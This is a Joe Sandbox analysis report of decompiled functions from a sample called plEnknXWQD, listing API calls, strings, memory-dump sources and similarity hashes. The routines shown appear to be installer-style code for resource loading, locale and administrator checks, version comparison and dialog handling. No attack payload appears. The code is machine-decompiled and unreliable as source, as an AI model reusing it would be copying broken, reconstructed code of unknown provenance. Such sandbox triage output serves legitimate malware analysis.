C-Code - Quality: 82%

			E0038468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}

0x00384699
0x0038469b
0x003846a9
0x003846af
0x003846b4
0x003846bc
0x003846f9
0x00000000
0x003846f9
0x003846d9
0x003846dd
0x00000000
0x00000000
0x003846e5
0x003846ef
0x00000000
0x003846f5
0x003846ff

APIs

FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846A0
SizeofResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846A9
FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846C3
LoadResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846CC
LockResource.KERNEL32(00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846D3
memcpy_s.MSVCRT ref: 003846E5
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003846EF

Strings

lega, xrefs: 003846E4
TITLE, xrefs: 0038469D, 003846C0

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID: TITLE$lega
API String ID: 3370778649-934471404
Opcode ID: fb5186acb0739c2b5c4cc04c7a4d10ded6161672b259f8f2122487f22e8b335c
Instruction ID: 267d27f64b058c6c8c86f62813a1fb2372c1107d6aa7058468c21025c0350ddf
Opcode Fuzzy Hash: fb5186acb0739c2b5c4cc04c7a4d10ded6161672b259f8f2122487f22e8b335c
Instruction Fuzzy Hash: F00128722407017BF3222BA56C0CF2B3E2CDBCAF62F090095FA4997180D9B18C4083B2

Uniqueness

Uniqueness Score: -1.00%

Function 0038681F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 81
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0038681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0x388004; // 0xb25159a8
				_v8 = _t19 ^ _t44;
				_t41 =  *0x3881d8; // 0x0
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0x3881d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0x3881d8; // 0x0
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0x381140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E003866F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0x3881d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				_t18 =  &_v8; // 0x38463b
				return E00386CE0(_t41, _t36,  *_t18 ^ _t44, _t40, _t41, _t43);
			}

0x0038681f
0x0038682a
0x00386831
0x00386836
0x0038683c
0x0038683e
0x00386848
0x00386851
0x0038685d
0x00386864
0x00386876
0x0038693a
0x0038693a
0x0038687c
0x0038687e
0x00386885
0x00000000
0x003868d6
0x003868f4
0x00386900
0x00386902
0x0038690a
0x00000000
0x0038690c
0x0038690c
0x0038691c
0x00000000
0x0038691e
0x00386924
0x0038692b
0x00386932
0x00000000
0x00000000
0x00000000
0x0038692b
0x0038691c
0x0038690a
0x00386885
0x00386876
0x00386940
0x00386951

APIs

GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0038686E
GetSystemMetrics.USER32(0000004A), ref: 003868A7
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 003868CC
RegQueryValueExA.ADVAPI32(?,00381140,00000000,?,?,0000000C), ref: 003868F4
RegCloseKey.ADVAPI32(?), ref: 00386902

Part of subcall function 003866F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0038691A), ref: 00386741

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 003868C2
;F8, xrefs: 00386940

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: ;F8$Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-4254851587
Opcode ID: e0c813a3f3c7829e7b06fb292cdc0396edc65d869807867bcb672bd9012334f6
Instruction ID: 5d02f63177b884b93f4ce60a49e1ff4cd7fbb5e34b3629b6b43188526bf96c8a
Opcode Fuzzy Hash: e0c813a3f3c7829e7b06fb292cdc0396edc65d869807867bcb672bd9012334f6
Instruction Fuzzy Hash: 5B316F71A00318DFDB33EB51CD46BAAB7BCEB85768F0101E5E949A6180DB309E85CF52

Uniqueness

Uniqueness Score: -1.00%

Function 003817EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E003817EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0x388004; // 0xb25159a8
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0x38a288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E00386CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}

0x003817f6
0x003817fd
0x00381805
0x0038180b
0x0038180d
0x00381815
0x00381818
0x00381820
0x00381824
0x0038182c
0x00381832
0x00381837
0x00381851
0x00381854
0x0038185d
0x00381862
0x0038186c
0x00381872
0x00381877
0x0038187e
0x0038187e
0x00381883
0x00381883
0x0038185d
0x0038188a
0x0038188a
0x003818a2

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,003818DD), ref: 0038181A
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0038182C
AllocateAndInitializeSid.ADVAPI32(003818DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,003818DD), ref: 00381855
FreeSid.ADVAPI32(?,?,?,?,003818DD), ref: 00381883
FreeLibrary.KERNEL32(00000000,?,?,?,003818DD), ref: 0038188A

Strings

advapi32.dll, xrefs: 00381810
CheckTokenMembership, xrefs: 00381826

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: 982942627e83767fb488f37388f077e13bf3748849398773df907dad9a782e51
Instruction ID: 996031a9dcf2bb69b3968e56b1592dac847bc92ee938bf24cf682ba8e488114b
Opcode Fuzzy Hash: 982942627e83767fb488f37388f077e13bf3748849398773df907dad9a782e51
Instruction Fuzzy Hash: F7116A71E00305AFDB12AFA4DC4AABEB77CEF44701F1105AAF905E6250DA719D058791

Uniqueness

Uniqueness Score: -1.00%

Function 00383450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00383450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E003843D0(_t24, _t12);
					SetWindowTextA(_t24, "lega");
					SetDlgItemTextA(_t24, 0x838,  *0x389404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0x3891dc = 1;
					goto L8;
				}
				return 0;
			}

0x00383459
0x0038345c
0x003834d8
0x003834de
0x00000000
0x003834e0
0x0038345e
0x00383463
0x0038349a
0x003834a0
0x003834a7
0x003834b2
0x003834c4
0x003834cb
0x00000000
0x003834cb
0x00383468
0x0038346e
0x00383474
0x00000000
0x00000000
0x0038347c
0x0038348c
0x00383490
0x00000000
0x00383496
0x00383484
0x00000000
0x00000000
0x00383486
0x00000000
0x00383486
0x00000000

APIs

EndDialog.USER32(?,?), ref: 00383490
GetDesktopWindow.USER32 ref: 0038349A
SetWindowTextA.USER32(?,lega), ref: 003834B2
SetDlgItemTextA.USER32(?,00000838), ref: 003834C4
SetForegroundWindow.USER32(?), ref: 003834CB
EndDialog.USER32(?,00000002), ref: 003834D8

Strings

lega, xrefs: 003834AC

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Window$DialogText$DesktopForegroundItem
String ID: lega
API String ID: 852535152-245445314
Opcode ID: 03cfdaeb1aa777ebe13b4e19f50b02b25d04c3f38db6ac860b3e5f8c663084d2
Instruction ID: 7fab56c1a88faeba010158cec58b9a4a0a42378db878cd93cae9f6e6cd2d6a19
Opcode Fuzzy Hash: 03cfdaeb1aa777ebe13b4e19f50b02b25d04c3f38db6ac860b3e5f8c663084d2
Instruction Fuzzy Hash: BC01B131240714ABEB176F66DC0C97D3A68EB05F10F024492F94787AA0CB709F51CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00382AAC Relevance: 12.1, APIs: 8, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00382AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0x388004; // 0xb25159a8
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0x389a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E00381680(_t65, E003817C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E003865E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E00381680(_t65, E003817C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E00386CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}

0x00382aac
0x00382ab7
0x00382abc
0x00382abe
0x00382ac3
0x00382ac6
0x00382ac9
0x00382ace
0x00382ae6
0x00382bdc
0x00382bdc
0x00382be0
0x00000000
0x00000000
0x00382af2
0x00382afc
0x00382b00
0x00382b05
0x00382b05
0x00382b0b
0x00382bca
0x00382bd1
0x00382b11
0x00382b18
0x00382b26
0x00382b99
0x00382bc8
0x00000000
0x00000000
0x00382b9b
0x00382bae
0x00382bb3
0x00382bb5
0x00382bb5
0x00382bb8
0x00382bb8
0x00382bba
0x00382bbb
0x00000000
0x00382bb8
0x00382b28
0x00382b2e
0x00382b33
0x00382b39
0x00382b3c
0x00382b3c
0x00382b3e
0x00382b3f
0x00382b55
0x00382b5d
0x00382b64
0x00382b64
0x00382b7a
0x00382b7f
0x00382b81
0x00382b81
0x00382b84
0x00382b84
0x00382b86
0x00382b87
0x00382bbf
0x00382bc1
0x00382bc1
0x00382b26
0x00382bda
0x00382bda
0x00382be6
0x00382be6
0x00382bf8

APIs

GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00382AE6
IsDBCSLeadByte.KERNEL32(00000000), ref: 00382AF2
CharNextA.USER32(?), ref: 00382B12
CharUpperA.USER32 ref: 00382B1E
CharPrevA.USER32(?,?), ref: 00382B55
CharNextA.USER32(?), ref: 00382BD4

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
String ID:
API String ID: 571164536-0
Opcode ID: 550d4323dd1f25497eb959b3df04d7d9972837aa2832859f4a5c7fee1626825d
Instruction ID: 266dbc8928cef58145818dd5a387f4e540842ac738206e4dec79e41d32cd4142
Opcode Fuzzy Hash: 550d4323dd1f25497eb959b3df04d7d9972837aa2832859f4a5c7fee1626825d
Instruction Fuzzy Hash: CC41F2345093855EEF17AF348C54AFE7BAD9F56310F1900DAE8C287202DB758E86CB61

Uniqueness

Uniqueness Score: -1.00%

Function 003828E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E003828E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				char _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E00382773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t11 =  &_v32; // 0x383938
						_t68 = GetFileVersionInfoSizeA(_v12, _t11);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									_t16 =  &_v32; // 0x383938
									if(GetFileVersionInfoA(_v12,  *_t16, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00382A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00382A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

0x003828f1
0x003828f4
0x003828f7
0x003828f9
0x003828fc
0x003828ff
0x00382901
0x00382907
0x00382a62
0x00382a64
0x0038290d
0x0038290d
0x0038290f
0x00382912
0x00382920
0x00382937
0x00000000
0x00000000
0x0038293d
0x00382944
0x0038294a
0x0038294f
0x00382a2f
0x00382a32
0x00382a34
0x00382a37
0x00382a41
0x00000000
0x00000000
0x00382955
0x0038295e
0x00382962
0x00382969
0x0038296f
0x00382974
0x0038297e
0x0038298c
0x00382a20
0x00382a21
0x00382a27
0x00382a4c
0x00382a4f
0x00382a50
0x00382a53
0x00382a56
0x00382a5c
0x00000000
0x00000000
0x00000000
0x00000000
0x003829b2
0x003829b2
0x003829b5
0x003829bd
0x003829c3
0x003829cc
0x003829d5
0x003829d7
0x003829da
0x003829dd
0x003829df
0x003829ec
0x003829f8
0x003829fc
0x003829ff
0x00382a02
0x00382a07
0x00382a0a
0x00382a0f
0x00382a19
0x00382a81
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00382a0f
0x0038298c
0x00382974
0x00382962
0x00000000
0x0038294f
0x00382912
0x00382a65
0x00382a68
0x00382a6c
0x00382a6f
0x00382a6f
0x00382a7d

APIs

GlobalFree.KERNEL32 ref: 00382A6F

Part of subcall function 00382773: CharUpperA.USER32(B25159A8,00000000,00000000,00000000), ref: 003827A8
Part of subcall function 00382773: CharNextA.USER32(0000054D), ref: 003827B5
Part of subcall function 00382773: CharNextA.USER32(00000000), ref: 003827BC
Part of subcall function 00382773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00382829
Part of subcall function 00382773: RegQueryValueExA.ADVAPI32(?,00381140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00382852
Part of subcall function 00382773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00382870
Part of subcall function 00382773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003828A0

GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00383938,?,?,?,?,-00000005), ref: 00382958
GlobalLock.KERNEL32 ref: 00382969
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00383938,?,?,?,?,-00000005,?), ref: 00382A21
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00383938,?,?), ref: 00382A81

Strings

898, xrefs: 0038293D, 0038297E, 00382940

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
String ID: 898
API String ID: 3949799724-4089403422
Opcode ID: 0e7182a474b361a3eddf86aa08ba528772318132daaef1067dec419edd7066e0
Instruction ID: ae2cc59d964c28c2543e4a388cbf92902c816f83a6af35bda04058cf2c7a232a
Opcode Fuzzy Hash: 0e7182a474b361a3eddf86aa08ba528772318132daaef1067dec419edd7066e0
Instruction Fuzzy Hash: 45513C71D00319DFDB26EFA8C884AAEFBB9FF48700F1540AAE905E7211DB359941DB90

Uniqueness

Uniqueness Score: -1.00%

Function 003843D0 Relevance: 10.6, APIs: 7, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E003843D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0x388004; // 0xb25159a8
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E00386CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}

0x003843d0
0x003843d8
0x003843df
0x003843e6
0x003843ec
0x003843f1
0x00384400
0x00384403
0x0038440b
0x00384420
0x00384429
0x00384437
0x00384444
0x00384447
0x0038444d
0x00384454
0x0038445b
0x00384460
0x00384461
0x00384467
0x0038446f
0x00384473
0x00384473
0x00384463
0x00384463
0x00384463
0x0038447a
0x00384481
0x00384484
0x0038448a
0x00384492
0x00384496
0x00384496
0x00384486
0x00384486
0x00384486
0x003844b8

APIs

GetWindowRect.USER32(?,?), ref: 003843F1
GetWindowRect.USER32(00000000,?), ref: 0038440B
GetDC.USER32(?), ref: 00384423
GetDeviceCaps.GDI32(00000000,00000008), ref: 0038442E
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0038443A
ReleaseDC.USER32(?,00000000), ref: 00384447
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001), ref: 003844A2

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: a3cace097c11872d72f07a74473b50ad1e3efd084b392bdce7806ce3ea66b724
Instruction ID: 52d07f5ad30638eea30090d241d5b7b671f3e4285426ba138864d3e3ed4bfc29
Opcode Fuzzy Hash: a3cace097c11872d72f07a74473b50ad1e3efd084b392bdce7806ce3ea66b724
